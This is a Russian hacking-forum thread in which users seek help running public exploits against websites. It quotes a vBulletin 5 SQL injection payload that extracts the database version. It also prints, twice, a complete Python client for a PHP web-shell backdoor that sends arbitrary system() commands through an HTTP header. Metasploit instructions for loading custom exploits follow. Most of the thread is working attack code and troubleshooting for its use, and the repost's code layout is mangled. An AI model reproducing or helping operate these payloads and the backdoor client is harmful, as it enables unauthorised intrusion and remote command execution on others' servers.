Запускаем сплойты

Discussion in 'Безопасность и Анонимность' started by Zitt, 4 Nov 2006.

  1. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    Подскажите как запустить данный експлоит?
    http://www.exploit-db.com/exploits/18424/
     
  2. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    529
    Likes Received:
    253
    Reputations:
    32
    так как и обычные php
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Во общем не могу разобраться как запустить этот эксплоит http://57un.wordpress.com/2013/03/24/ewww-vbulletin-5-beta-xx-sqli-0day-exploit-nasty на видео показано, что нужно его запустить с Localhost в этой теме написано ,что нужно установить ActivePerl и запустить через командную строку, я пытался сделать как на видео, скачал WAMP кидаю в папку "WWW" экплоит в формате .pl но нефига не получается и переименовал его в PHP тоже самое. А когда запускаю через командную строку [​IMG]

    Помогите запустить, как показано на видео!
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Для этого эксплоита требуется зареганный логин пасс от форума! он сначало авторезируется, а только потом эксплуатирует уязвимость!
     
    _________________________
  5. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    То запустить в таком формате: site.com /forum.php User Password и что такое MAGICNUM?

    P.S Пробел нужно ставить после хоста или сплошным адресом?
     
    #105 Unknowhacker, 12 Jul 2013
    Last edited: 12 Jul 2013
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    обрати внимание на код эксплоита:

    Ищи через пост запрос!
     
    _________________________
  7. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Когда добавляю строку index.php/ajax/api/reputation/vote меняется структура сайта на простую (т.е на белом фоне как бы упрощённый режим) Но дальнейший код [
    'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ], не проходит - всё белое
     
  8. Brooklyn111

    Brooklyn111 New Member

    Joined:
    13 Feb 2011
    Messages:
    54
    Likes Received:
    0
    Reputations:
    0
    запускаю этот сплойт C:\Python33>python.exe c:\python33\php-sh\client.py
    #!/usr/bin/python
    # Client for the backdoor which
    # uses HTTP CODE header for inserting code
    # Got the idea after seeing this sort of payload
    # dropped by a phpmyadmin exploit on rdot :)
    # Is also good to learn how to use urllib
    # and not be lazy arse with requests all of time!
    # Insecurety Research (2013) - insecurety.net
    import urllib2
    import sys

    def usage(program):
    print "HTTP CODE Header Backdoor Command Shell"
    print "Usage: %s <Backdoor URL>" %(program)
    print "Example: %s http://www.test.com/webshell.php" %(program)
    sys.exit(0)

    def main(args):
    try:
    if len(args) < 2:
    usage(args[0])

    print "[+] Using %s as target" %(args[1])
    print "[!] Popping a shell, type 'exit' to quit"
    while True:
    opener = urllib2.build_opener()
    url = args[1]
    cmd = raw_input('~$ ')
    if cmd == "exit":
    sys.exit(0)
    else:
    code = "system('%s');" %(cmd)
    opener.addheaders.append(('Code', code))# %(str(code))
    urllib2.install_opener(opener)
    result = urllib2.urlopen(url).read()
    print result
    except Exception, e:
    print e

    if __name__ == "__main__":
    main(sys.argv)
    в итоге вылазит File "c:\python33\php-sh\client.py", line 13
    print "HTTP CODE Header Backdoor Command Shell"
    ^
    SyntaxError: invalid syntax
    в чем проблема? что там на 13 линии, что исправить? Посоветуйте пожалуйста
    сам сплойт лежит тут _ttp://packetstormsecurity.com/files/download/122167/php-sh.tar.gz
    заранее благодарен за совет!
     
  9. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    290
    Likes Received:
    40
    Reputations:
    24
    В программах на языке Python отступы являются требованием языка, а не стилем

    PHP:
    #!/usr/bin/python
    # Client for the backdoor which
    # uses HTTP CODE header for inserting code
    # Got the idea after seeing this sort of payload
    # dropped by a phpmyadmin exploit on rdot :)
    # Is also good to learn how to use urllib
    # and not be lazy arse with requests all of time!
    # Insecurety Research (2013) - insecurety.net
    import urllib2
    import sys

    def usage
    (program):
        print 
    "HTTP CODE Header Backdoor Command Shell"
        
    print "Usage: %s <Backdoor URL>" %(program)
        print 
    "Example: %s http://www.test.com/webshell.php" %(program)
        
    sys.exit(0)

    def main(args):
        try:
            if 
    len(args) < 2:
                
    usage(args[0])

            print 
    "[+] Using %s as target" %(args[1])
            print 
    "[!] Popping a shell, type 'exit' to quit"
            
    while True:
                
    opener urllib2.build_opener()
                
    url args[1]
                
    cmd raw_input('~$ ')
                if 
    cmd == "exit":
                    
    sys.exit(0)
                else:
                    
    code "system('%s');" %(cmd)
                    
    opener.addheaders.append(('Code'code))# %(str(code))
                    
    urllib2.install_opener(opener)
                    
    result urllib2.urlopen(url).read()
                    print 
    result
        except Exception
    e:
            print 
    e

    if __name__ == "__main__"
        
    main(sys.argv)
     
    #109 tester_new, 27 Jul 2013
    Last edited: 27 Jul 2013
    1 person likes this.
  10. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Интересует запуск этого exploit
     
  11. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    290
    Likes Received:
    40
    Reputations:
    24
    1.Launch a terminal window and navigate to the ".msf" folder in your home folder with the "cd" command. The ".msf" folder will be called ".msf3" if you are using Metasploit 3.

    2
    Create a directory structure matching that of the primary, shared "msf" folder using the "mkdir" command. For example, to add a miscellaneous Windows exploit you would create a directory structure that looked like "modules/exploits/windows/misc" in the ".msf" folder.

    3
    Copy your exploit into the directory using the "cp" command. The next time you start Metasploit, you will see an additional exploit in the framework list and may access the exploit with the "use" command.
     
    1 person likes this.
Loading...